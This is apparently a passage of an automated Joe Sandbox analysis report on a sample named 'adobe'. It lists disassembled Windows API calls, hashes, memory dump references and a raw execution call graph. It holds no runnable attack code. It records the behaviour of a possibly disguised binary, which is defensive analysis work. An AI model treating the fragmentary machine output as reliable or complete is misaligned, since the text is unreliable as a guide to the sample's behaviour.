                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressCloseHandleModuleProc
                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                          • API String ID: 4190037839-2401316094
                                                                                                                                                          • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                          • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                                                          • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                          • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
• Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
• Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
• Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
• Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
• LocalFree.KERNEL32(005B0AA0,00000000,00401AB4), ref: 00401A1B
• VirtualFree.KERNEL32(?,00000000,00008000,005B0AA0,00000000,00401AB4), ref: 00401A3A
• LocalFree.KERNEL32(005AE3B8,?,00000000,00008000,005B0AA0,00000000,00401AB4), ref: 00401A79
• RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
• RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID: Z
• API String ID: 3782394904-4052018393
• Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
• Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
  • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
  • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
• Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
• Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
• Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
• Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
Uniqueness

Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
• ExitProcess.KERNEL32 ref: 00403DE5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000$9@
• API String ID: 1220098344-1503883590
• Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
• Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
• Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
• Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
• Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0040C44C,?,?,?,00401800), ref: 004014B2
• VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0040C44C,?,?,?,00401800), ref: 004014D7
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0040C44C,?,?,?,00401800), ref: 004014FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: Virtual$Alloc$Free
• String ID: Z
• API String ID: 3668210933-4052018393
• Opcode ID: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
• Instruction ID: d5dc587d839e3be782c9b7b9e1ff5a952950f17ebcccd457e3de013d7af40e21
• Opcode Fuzzy Hash: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
• Instruction Fuzzy Hash: 7CF0C8717403106AEB316E694CC5F533AD89F85754F1040BAFA0DFF3DAD6745800826C
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: QueryValue
• String ID: )q@
• API String ID: 3660427363-2284170586
• Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
• Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
• Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
• Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
• GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: CommandHandleLineModule
• String ID: U1hd.@
• API String ID: 2123368496-2904493091
• Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
• Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
• Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
• Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1458359878-0
                                                                                                                                                          • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                          • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                                                          • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                          • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:15.6%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:4.4%
                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                          Total number of Limit Nodes:97
50709->50711 50712 4698e3 50710->50712 50713 46994e 50711->50713 50714 40357c 18 API calls 50712->50714 50715 414b28 18 API calls 50713->50715 50716 4698ec 50714->50716 50717 46990a 50715->50717 50718 40357c 18 API calls 50716->50718 51590 46634c 50717->51590 50720 4698f9 50718->50720 50721 414b28 18 API calls 50720->50721 50721->50717 50724->50682 50726 4683ec 33 API calls 50725->50726 50728 46a134 50726->50728 50727 46a168 51752 464af4 50727->51752 50728->50727 50729 464af4 21 API calls 50728->50729 50729->50727 50733 46a180 50735 46a26a 50733->50735 50736 46a1ce 50733->50736 51773 46a0d0 33 API calls 50733->51773 50738 46a32c GetSystemMenu EnableMenuItem 50735->50738 50737 4683ec 33 API calls 50736->50737 50737->50735 50739 414b28 18 API calls 50738->50739 50740 46a34c 50739->50740 50741 46a382 50740->50741 50742 46a358 50740->50742 50745 46a3a1 50741->50745 50746 46a3cb 50741->50746 50743 414b28 18 API calls 50742->50743 50744 46a36c 50743->50744 50747 414b28 18 API calls 50744->50747 50748 414b28 18 API calls 50745->50748 50749 414b28 18 API calls 50746->50749 50750 46a380 50747->50750 50751 46a3b5 50748->50751 50752 46a3df 50749->50752 51769 46a064 50750->51769 50754 414b28 18 API calls 50751->50754 50753 414b28 18 API calls 50752->50753 50753->50750 50754->50750 50758 4684b0 33 API calls 50761 46a47d 50758->50761 50759 46a41d 50759->50758 50760 46a4e0 50760->50614 50761->50760 51775 493350 32 API calls 50761->51775 50764 46b5f0 61 API calls 50763->50764 50765 481693 50764->50765 50766 48169c 50765->50766 51975 408be8 19 API calls 50765->51975 50768 414af8 18 API calls 50766->50768 50769 4816ac 50768->50769 50770 403450 18 API calls 50769->50770 50771 4816b9 50770->50771 51795 46b900 50771->51795 50774 4816c9 50775 414af8 18 API calls 50774->50775 50777 4816d9 50775->50777 50778 403450 18 API calls 50777->50778 50779 4816e6 50778->50779 50780 4690a4 SendMessageA 50779->50780 50781 4816ff 50780->50781 50782 48173d 50781->50782 51977 478bf8 37 API calls 
50781->51977 50784 4241ec 11 API calls 50782->50784 50785 481747 50784->50785 50786 481758 SetActiveWindow 50785->50786 50787 48176d 50785->50787 50786->50787 51824 480c4c 50787->51824 50834->50596 50835->50580 50836->50580 50837->50580 53684 43d21c 50838->53684 50841 493430 53689 431424 50841->53689 50842 4934b6 50843 4934c5 50842->50843 53722 492c2c 18 API calls 50842->53722 50843->50614 50852 49347a 53720 492cc0 18 API calls 50852->53720 50854 49348e 53721 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50854->53721 50856 4934ae 50856->50614 50857->50605 50859 457239 50858->50859 50860 457259 50859->50860 50861 4078fc 33 API calls 50859->50861 50863 403400 4 API calls 50860->50863 50862 457251 50861->50862 50864 457008 38 API calls 50862->50864 50865 45726e 50863->50865 50864->50860 50865->50618 50866->50614 50892 46b67c 50867->50892 50870 414af8 50871 414b06 50870->50871 50872 4034e0 18 API calls 50871->50872 50873 414b13 50872->50873 50873->50627 50874->50636 50876 465e2e 50875->50876 51066 4078fc 50876->51066 50880 450ab8 50879->50880 51109 42cc98 50884->51109 50887 450ac8 50888 450a98 18 API calls 50887->50888 50889 450ae4 50888->50889 50890 47d6ec 56 API calls 50889->50890 50890->50634 50891->50653 50893 414af8 18 API calls 50892->50893 50894 46b6ae 50893->50894 50946 4660ac 50894->50946 50898 46b6c0 50899 46b6cf 50898->50899 50901 46b6e8 50898->50901 51000 47d6ec 56 API calls 50899->51000 50903 46b72f 50901->50903 50905 46b716 50901->50905 50902 403420 4 API calls 50904 46aa46 50902->50904 50906 46b794 50903->50906 50919 46b733 50903->50919 50904->50622 50904->50870 51001 47d6ec 56 API calls 50905->51001 51003 42cb18 CharNextA 50906->51003 50909 46b7a3 50910 46b7a7 50909->50910 50914 46b7c0 50909->50914 51004 47d6ec 56 API calls 50910->51004 50912 46b77b 51002 47d6ec 56 API calls 50912->51002 50913 46b7e4 51005 47d6ec 56 API calls 50913->51005 50914->50913 50960 46621c 50914->50960 50919->50912 50919->50914 50922 46b7fd 50923 403778 18 API calls 
50922->50923 50924 46b813 50923->50924 50968 42c968 50924->50968 50927 46b824 51006 4662a8 18 API calls 50927->51006 50928 46b852 50930 42c898 19 API calls 50928->50930 50932 46b85d 50930->50932 50931 46b837 50933 450ac8 18 API calls 50931->50933 50972 42c40c 50932->50972 50935 46b844 50933->50935 51007 47d6ec 56 API calls 50935->51007 50936 46b868 50982 42cb8c 50936->50982 50945 46b6e3 50945->50902 50947 4660c6 50946->50947 50949 42cb8c 20 API calls 50947->50949 50950 403450 18 API calls 50947->50950 50951 406bb8 18 API calls 50947->50951 50952 46610f 50947->50952 51009 42ca78 50947->51009 50949->50947 50950->50947 50951->50947 50953 403420 4 API calls 50952->50953 50954 466129 50953->50954 50955 414b28 50954->50955 50956 414af8 18 API calls 50955->50956 50957 414b4c 50956->50957 50958 403400 4 API calls 50957->50958 50959 414b7d 50958->50959 50959->50898 50961 466226 50960->50961 50962 466239 50961->50962 51039 42cb08 CharNextA 50961->51039 50962->50913 50964 46624c 50962->50964 50965 466256 50964->50965 50966 466283 50965->50966 51040 42cb08 CharNextA 50965->51040 50966->50913 50966->50922 50969 42c9c1 50968->50969 50970 42c97e 50968->50970 50969->50927 50969->50928 50970->50969 51041 42cb08 CharNextA 50970->51041 50973 42c416 50972->50973 50974 42c439 50972->50974 51042 42c948 CharPrevA 50973->51042 50976 403494 4 API calls 50974->50976 50977 42c442 50976->50977 50977->50936 50978 42c41d 50978->50974 50979 42c428 50978->50979 51043 4035c0 50979->51043 50981 42c436 50981->50936 50983 42c648 IsDBCSLeadByte 50982->50983 50984 42cb9d 50983->50984 50985 42cbc4 50984->50985 51065 42cb10 CharPrevA 50984->51065 51000->50945 51001->50945 51002->50945 51003->50909 51004->50945 51005->50945 51006->50931 51007->50945 51010 403494 4 API calls 51009->51010 51011 42ca88 51010->51011 51016 42cabe 51011->51016 51018 403744 51011->51018 51022 42c454 IsDBCSLeadByte 51011->51022 51014 42cb02 51014->50947 51016->51014 51023 4037b8 51016->51023 51028 42c454 IsDBCSLeadByte 
51016->51028 51019 40374a 51018->51019 51021 40375b 51018->51021 51020 4034bc 18 API calls 51019->51020 51019->51021 51020->51021 51021->51011 51022->51011 51024 403744 18 API calls 51023->51024 51026 4037c6 51024->51026 51025 4037fc 51025->51016 51026->51025 51029 4038a4 51026->51029 51028->51016 51030 4038b1 51029->51030 51037 4038e1 51029->51037 51031 4038da 51030->51031 51034 4038bd 51030->51034 51035 4034bc 18 API calls 51031->51035 51032 403400 4 API calls 51033 4038cb 51032->51033 51033->51025 51038 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51034->51038 51035->51037 51037->51032 51038->51033 51039->50961 51040->50965 51041->50970 51042->50978 51044 4035c4 51043->51044 51050 40357c 51043->51050 51045 403450 51044->51045 51046 4035e2 51044->51046 51047 4035d4 51044->51047 51044->51050 51052 4034bc 18 API calls 51045->51052 51054 403464 51045->51054 51049 4034bc 18 API calls 51046->51049 51053 403450 18 API calls 51047->51053 51050->51045 51051 4035bf 51050->51051 51055 40358a 51050->51055 51051->50981 51052->51054 51053->51050 51057 4035b4 51055->51057 51058 40359d 51055->51058 51065->50984 51069 407910 51066->51069 51070 40792d 51069->51070 51077 4075c0 51070->51077 51073 407959 51074 4034e0 18 API calls 51073->51074 51076 40790b 51074->51076 51076->50644 51080 4075db 51077->51080 51078 4075ed 51078->51073 51082 4069a8 19 API calls 51078->51082 51080->51078 51083 4076e2 33 API calls 51080->51083 51084 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51080->51084 51082->51073 51083->51080 51084->51080 51110 42cb8c 20 API calls 51109->51110 51111 42ccba 51110->51111 51112 42ccc2 GetFileAttributesA 51111->51112 51113 403400 4 API calls 51112->51113 51114 42ccdf 51113->51114 51114->50634 51114->50887 51115->50662 51118 469aef 51116->51118 51117 469f67 51119 469f82 51117->51119 51120 469fb3 51117->51120 51118->51117 51121 469baa 51118->51121 51125 403494 4 API calls 51118->51125 51124 403494 4 API calls 51119->51124 51122 403494 4 API calls 
51120->51122 51123 469bcb 51121->51123 51127 469c0c 51121->51127 51126 469fc1 51122->51126 51128 403494 4 API calls 51123->51128 51129 469f90 51124->51129 51130 469b2e 51125->51130 51223 468998 26 API calls 51126->51223 51131 403400 4 API calls 51127->51131 51133 469bd9 51128->51133 51222 468998 26 API calls 51129->51222 51135 414af8 18 API calls 51130->51135 51136 469c0a 51131->51136 51137 414af8 18 API calls 51133->51137 51139 469b4f 51135->51139 51159 469cf0 51136->51159 51202 4690a4 51136->51202 51141 469bfa 51137->51141 51138 469f9e 51140 403400 4 API calls 51138->51140 51142 403634 18 API calls 51139->51142 51145 469fe4 51140->51145 51147 403634 18 API calls 51141->51147 51143 469b5f 51142->51143 51148 414af8 18 API calls 51143->51148 51151 403400 4 API calls 51145->51151 51146 469d78 51149 403400 4 API calls 51146->51149 51147->51136 51152 469b73 51148->51152 51153 469d76 51149->51153 51150 469c2c 51154 469c32 51150->51154 51155 469c6a 51150->51155 51156 469fec 51151->51156 51152->51121 51162 414af8 18 API calls 51152->51162 51217 4694e0 57 API calls 51153->51217 51157 403494 4 API calls 51154->51157 51160 403400 4 API calls 51155->51160 51158 403420 4 API calls 51156->51158 51163 469c40 51157->51163 51164 469ff9 51158->51164 51159->51146 51165 469d37 51159->51165 51161 469c68 51160->51161 51211 469398 51161->51211 51166 469b9a 51162->51166 51208 47af6c 51163->51208 51164->50671 51169 403494 4 API calls 51165->51169 51170 403634 18 API calls 51166->51170 51173 469d45 51169->51173 51170->51121 51171 469da1 51180 469e02 51171->51180 51181 469dac 51171->51181 51172 469c58 51176 403634 18 API calls 51172->51176 51174 414af8 18 API calls 51173->51174 51177 469d66 51174->51177 51176->51161 51179 403634 18 API calls 51177->51179 51178 469c91 51184 469cf2 51178->51184 51185 469c9c 51178->51185 51179->51153 51182 403400 4 API calls 51180->51182 51183 403494 4 API calls 51181->51183 51186 469e0a 51182->51186 51190 469dba 51183->51190 51187 403400 4 API calls 
51184->51187 51188 403494 4 API calls 51185->51188 51189 469e00 51186->51189 51200 469eb3 51186->51200 51187->51159 51193 469caa 51188->51193 51189->51186 51218 4932f4 18 API calls 51189->51218 51190->51186 51190->51189 51195 403634 18 API calls 51190->51195 51192 469e2d 51192->51200 51219 4935a0 32 API calls 51192->51219 51193->51159 51196 403634 18 API calls 51193->51196 51195->51190 51196->51193 51198 469f54 51221 429154 SendMessageA SendMessageA 51198->51221 51220 429104 SendMessageA 51200->51220 51201->50669 51224 42a050 SendMessageA 51202->51224 51204 4690b3 51205 4690d3 51204->51205 51225 42a050 SendMessageA 51204->51225 51205->51150 51207 4690c3 51207->51150 51226 47af8c 51208->51226 51213 4693c5 51211->51213 51212 469427 51214 403400 4 API calls 51212->51214 51213->51212 51550 46931c 57 API calls 51213->51550 51215 46943c 51214->51215 51215->51178 51217->51171 51218->51192 51219->51200 51220->51198 51221->51117 51222->51138 51223->51138 51224->51204 51225->51207 51227 403494 4 API calls 51226->51227 51234 47afbf 51227->51234 51228 47b0c4 51229 403420 4 API calls 51228->51229 51230 47af87 51229->51230 51230->51172 51232 403778 18 API calls 51232->51234 51234->51228 51234->51232 51237 4037b8 18 API calls 51234->51237 51238 479ee0 51234->51238 51470 4529b4 18 API calls 51234->51470 51471 403800 51234->51471 51475 42c948 CharPrevA 51234->51475 51237->51234 51239 479f32 51238->51239 51240 479f10 51238->51240 51241 479f52 51239->51241 51242 479f40 51239->51242 51240->51239 51480 478e10 33 API calls 51240->51480 51245 479fb5 51241->51245 51246 479f60 51241->51246 51243 403494 4 API calls 51242->51243 51469 479f4d 51243->51469 51253 479fd6 51245->51253 51254 479fc3 51245->51254 51247 479f8f 51246->51247 51248 479f69 51246->51248 51251 479fa2 51247->51251 51482 4529b4 18 API calls 51247->51482 51250 479f7c 51248->51250 51481 4529b4 18 API calls 51248->51481 51249 403400 4 API calls 51252 47a860 51249->51252 51256 403494 4 API calls 51250->51256 51258 403494 4 API 
